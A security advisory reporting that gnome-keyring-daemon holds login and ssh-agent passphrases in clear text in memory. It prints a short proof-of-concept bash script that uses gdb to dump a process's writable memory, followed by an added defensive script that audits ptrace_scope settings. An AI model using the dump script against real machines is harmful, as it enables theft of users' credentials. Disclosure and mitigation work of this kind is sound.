Gnome Keyring Daemon Credential Disclosure

2017-04-24T00:00:00
ID PACKETSTORM:142274
Type packetstorm
Reporter Luca Ercoli
Modified 2017-04-24T00:00:00

Description

                                        
gnome-keyring-daemon is vulnerable to local credential disclosure.

Fortunately, the attack can only be carried out on machines that are already compromised, but in those cases an attacker can leverage gnome-keyring-daemon to obtain sensitive data.

The application stores the passwords of logged-in users in clear text in process memory, and so exposes this information (such as the login password, the ssh-agent passphrase, etc.) to an attacker.

In this scenario, the attacker can read the data immediately, without cracking anything or installing a keylogger, sniffer or other tools, by using gnome-keyring-daemon itself: the information can be extracted from its memory with a debugger (such as "gdb").

A script named "memory_dump.sh", which can be used as a PoC, is available at this URL:

http://www.lucaercoli.it/

memory_dump.sh:

#!/bin/bash
# Usage: memory_dump.sh PID
# Dumps every writable private (rw-p) mapping of process PID into ./PID/

mkdir "$1"
cd "$1" || exit 1
grep rw-p "/proc/$1/maps" \
| awk '{print $1}' \
| sed 's/-/ /' \
| while read -r mem_start mem_end; do
    gdb --pid "$1" --batch-silent -ex "dump memory $mem_start-$mem_end.dump 0x$mem_start 0x$mem_end"
done
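
The PoC depends on a debugger being allowed to attach to the running daemon. The following audit script is an added example, not part of the advisory or of the reporter's code: it checks whether the kernel's Yama `ptrace_scope` policy permits that attach for the current user against each running keyring daemon. Assumptions: the function names are hypothetical, UID 0 is used as a stand-in for CAP_SYS_PTRACE, and the target process is assumed to be dumpable.

```bash
#!/bin/bash
# Added example, not from the advisory: audit whether the debugger attach that
# memory_dump.sh relies on is permitted against running keyring daemons.

# Yama ptrace_scope from FILE; a missing file means Yama is off (classic rules, 0).
read_ptrace_scope() {
    local file="${1:-/proc/sys/kernel/yama/ptrace_scope}" value=""
    [ -e "$file" ] || { echo 0; return 0; }
    read -r value < "$file" || true
    case "$value" in 0|1|2|3) echo "$value" ;; *) return 1 ;; esac
}

# Real UID from a /proc/PID/status file (first number on the "Uid:" line).
status_uid() {
    awk '$1 == "Uid:" { print $2; exit }' "$1"
}

# Verdict for a non-descendant attach (gdb --pid) by CALLER_UID on a dumpable
# process owned by TARGET_UID. UID 0 stands in for CAP_SYS_PTRACE (assumption).
attach_verdict() {
    local scope="$1" caller_uid="$2" target_uid="$3"
    case "$scope" in 0|1|2|3) ;; *) echo unknown; return 1 ;; esac
    if [ "$scope" -eq 3 ]; then echo blocked; return 0; fi      # attach disabled
    if [ "$caller_uid" -eq 0 ]; then echo exposed; return 0; fi # privileged caller
    # 1: only descendants or PR_SET_PTRACER peers; 2: CAP_SYS_PTRACE only
    if [ "$scope" -ge 1 ]; then echo blocked; return 0; fi
    # 0: classic rule, any process of the same user may attach
    if [ "$caller_uid" -eq "$target_uid" ]; then echo exposed; else echo blocked; fi
}

# Report every process whose comm matches NAME (comm is cut to 15 characters).
audit_daemons() {
    local name="${1:-gnome-keyring-d}" scope me st pid
    scope=$(read_ptrace_scope) || scope=unknown
    me=$(id -u)
    for st in /proc/[0-9]*/status; do
        [ -r "$st" ] || continue
        [ "$(awk '$1 == "Name:" { print $2; exit }' "$st" 2>/dev/null)" = "$name" ] || continue
        pid=${st#/proc/}; pid=${pid%/status}
        echo "pid=$pid scope=$scope verdict=$(attach_verdict "$scope" "$me" "$(status_uid "$st")")"
    done
}

audit_daemons "$@"
```

A `ptrace_scope` of 1 or higher stops a same-user process from attaching to an already running daemon, but it does not remove the secrets from memory, and a root-level attacker can still read them at scopes 0 to 2.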